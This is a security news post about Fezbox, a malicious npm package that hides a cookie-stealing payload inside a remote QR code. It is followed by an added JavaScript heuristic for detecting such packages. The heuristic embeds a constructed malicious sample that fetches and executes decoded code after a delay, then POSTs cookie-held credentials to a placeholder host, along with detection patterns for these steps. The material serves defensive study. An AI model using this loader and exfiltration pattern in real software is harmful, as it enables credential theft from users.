
Post: npm Package Uses QR Code Steganography to Steal Credentials - Against Invaders - CyberSecurity news for humans.


<div> <div> <div> <div data-edit-folder-name="text" data-index="0" data-layout-id="2" id="layout-ebdc1cdd-2adc-4395-ab61-62b39ee2c3f0">
<p>A malicious npm package named Fezbox has been found using an unusual technique to conceal harmful code.</p>
<p>The package uses a QR code as one layer of its obfuscation, with the end goal of stealing usernames and passwords from browser cookies.</p>
<p>The discovery was made by the Socket Threat Research Team.</p>
<h2><strong>A New Obfuscation Method</strong></h2>
<p>While attackers commonly hide malware with string reversal, encoding or encryption, Fezbox goes a step further by embedding its payload inside a QR code image. Once activated, the code attempts to extract user credentials from browser cookies and transmit them to a remote server.</p>
<p><a href="https://socket.dev/blog/malicious-fezbox-npm-package-steals-browser-passwords-from-cookies-via-innovative-qr-code" target="_self _blank">Socket flagged the package</a> through its AI-based malware scanner, which identified suspicious behaviors hidden beneath seemingly harmless utility functions. The package, which had at least 327 downloads, has since been removed after Socket petitioned the npm security team for its takedown and for the suspension of the associated account.</p>
<p><em><a href="https://www.infosecurity-magazine.com/news/ghostaction-supply-chain-3000/" target="_blank">Read more on supply chain attacks: GhostAction Supply Chain Attack Compromises 3000+ Secrets</a></em></p>
<h2><strong>How the Payload Works</strong></h2>
<p>Fezbox presents itself as a JavaScript/TypeScript helper library with features such as QR code generation.</p>
<p>What the documentation does not disclose is that the library also fetches a QR code from a remote URL, decodes it and executes whatever code it contains. After a 120-second delay, the malicious script loads and parses the QR code, then runs the hidden payload.</p>
<p>Once decoded, the payload attempts to:</p>
<ul>
<li><p>Retrieve a stored username and password from browser cookies</p></li>
<li><p>Reverse the string &ldquo;drowssap&rdquo; to recover the word &ldquo;password&rdquo; at runtime, so that the plaintext never appears in the source</p></li>
<li><p>Send the stolen credentials via an HTTPS POST request to a server hosted on Railway</p></li>
</ul>
<p>According to Socket, the stacking of several obfuscation layers, string reversal, QR code steganography and payload encryption, shows the actor&rsquo;s emphasis on stealth.</p>
<h2><strong>Lessons for Defenders</strong></h2>
<p>Many modern applications no longer store plaintext passwords in cookies, which limits what this particular harvester can collect; the attack is notable instead for the growing creativity in malware design that it demonstrates.</p>
<p>&ldquo;Using a QR code as a steganographic obfuscation technique is quite clever,&rdquo; the Socket team noted, &ldquo;[It] shows yet again that threat actors will continue to use any and all tools at their disposal.&rdquo;</p>
<p>The company also emphasized the importance of automated dependency scanning to catch malicious packages before they are introduced into software projects.</p>
</div> </div> </div></div>
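<p>As an added example (not Fezbox code, and not Socket's AI-based scanner), the following JavaScript turns the indicator chain described above into a small static heuristic that a dependency-scanning step could run over a package's source: string literals that spell a sensitive word backwards (&ldquo;drowssap&rdquo;), the reversal idiom that undoes them, code built from data at runtime, a startup delay of a minute or more, a remote image that is QR-decoded, and cookie access alongside an outbound POST. Both source samples are constructed for this example; the URLs, the <code>toImageData()</code> helper, the <code>jsQR()</code> call and the reversed cookie names in the malicious sample are placeholders modelled on the article's description, not the package's real values.</p>

```javascript
// Added example, not Fezbox code and not Socket's scanner: a small static
// heuristic that flags the indicator chain described in the article
// (reversed sensitive strings, a long startup delay, a remote image that is
// QR-decoded and then executed, and a POST carrying cookie data).
// Both source samples below are constructed for this example.

const SENSITIVE_WORDS = ["password", "username", "document.cookie"];

// Each rule inspects raw source text and returns zero or more detail strings.
const RULES = {
  // String literals that spell a sensitive word backwards ("drowssap" -> "password").
  "reversed-sensitive-string"(src) {
    const found = [];
    const literal = /(["'`])([^"'`\\\n]{4,40})\1/g;
    for (const m of src.matchAll(literal)) {
      const reversed = m[2].split("").reverse().join("");
      if (SENSITIVE_WORDS.includes(reversed.toLowerCase())) {
        found.push(`"${m[2]}" reverses to "${reversed}"`);
      }
    }
    return found;
  },
  // The canonical JS reversal idiom used to undo that obfuscation at runtime.
  "string-reversal-idiom"(src) {
    const idiom = /\.split\(\s*(['"`])\1\s*\)\s*\.reverse\(\s*\)\s*\.join\(\s*(['"`])\2\s*\)/;
    return idiom.test(src) ? ["split('').reverse().join('') on a literal"] : [];
  },
  // Code built from data at runtime, the only way a decoded QR payload can execute.
  "dynamic-code-execution"(src) {
    const found = [];
    if (/\beval\s*\(/.test(src)) found.push("eval(");
    if (/\bnew\s+Function\s*\(/.test(src)) found.push("new Function(");
    return found;
  },
  // A startup delay of a minute or more, long enough to outlast many sandbox runs.
  // Only plain numeric literals are recognised; arithmetic such as 2*60*1000 is not.
  "long-delay"(src) {
    const found = [];
    for (const m of src.matchAll(/setTimeout[\s\S]*?,\s*(\d+)\s*\)\s*;/g)) {
      const ms = Number(m[1]);
      if (ms >= 60_000) found.push(`setTimeout delay of ${ms} ms`);
    }
    return found;
  },
  // A library that claims to generate QR codes has no reason to fetch a remote image and decode one.
  "remote-image-decode"(src) {
    const fetchesImage = /fetch\s*\(\s*["'`]https?:\/\/[^"'`]+\.(?:png|jpe?g|gif|webp|svg)["'`]/i.test(src);
    const decodes = /\b(?:jsQR|decodeQR|qrDecode|readQR)\s*\(/.test(src);
    return fetchesImage && decodes ? ["remote image fetched and QR-decoded"] : [];
  },
  // Cookie access in the same module as an outbound POST.
  "cookie-exfiltration"(src) {
    const readsCookie = /document\.cookie/.test(src);
    const posts = /method\s*:\s*["'`]POST["'`]/i.test(src);
    return readsCookie && posts ? ["document.cookie read and HTTP POST in the same module"] : [];
  },
};

// Runs every rule and applies a simple verdict: three or more distinct
// indicators, or the fetch-decode-execute chain, marks the module suspicious.
function scanSource(src) {
  const findings = [];
  for (const [rule, check] of Object.entries(RULES)) {
    for (const detail of check(src)) findings.push({ rule, detail });
  }
  const fired = new Set(findings.map((f) => f.rule));
  const chain = fired.has("remote-image-decode") && fired.has("dynamic-code-execution");
  return { suspicious: fired.size >= 3 || chain, fired: [...fired], findings };
}

// Constructed sample modelled on the behaviour the article describes; the URLs,
// toImageData(), jsQR() and the reversed cookie names are placeholders, not Fezbox's real values.
const MALICIOUS_SAMPLE = `
setTimeout(async () => {
  const img = await fetch("https://example.invalid/assets/banner.png");
  const decoded = jsQR(await toImageData(img));
  new Function(decoded.data)();
}, 120000);
function harvest() {
  const pw = "drowssap".split("").reverse().join("");
  const un = "emanresu".split("").reverse().join("");
  const jar = Object.fromEntries(document.cookie.split("; ").map((c) => c.split("=")));
  return fetch("https://example.invalid/collect", { method: "POST", body: JSON.stringify({ u: jar[un], p: jar[pw] }) });
}
`;

// Constructed benign sample: a QR generator that also happens to reverse strings.
const BENIGN_SAMPLE = `
export function toQRMatrix(text) {
  return layoutModules(encodeBytes(text));
}
export function reverseWords(sentence) {
  return sentence.split(" ").reverse().join(" ");
}
`;

console.log(JSON.stringify(scanSource(MALICIOUS_SAMPLE), null, 2));
console.log(JSON.stringify(scanSource(BENIGN_SAMPLE), null, 2));
```

<p>Run with <code>node</code>, the constructed malicious sample fires all six rules (including the 120000 ms delay that matches the article's 120-second wait) and is marked suspicious, while the benign QR generator produces no findings. The rules are deliberately coarse: each is trivial to evade on its own, which is why the verdict requires several independent indicators to coincide, and why a scanner of this kind complements rather than replaces behavioural analysis of the installed package.</p>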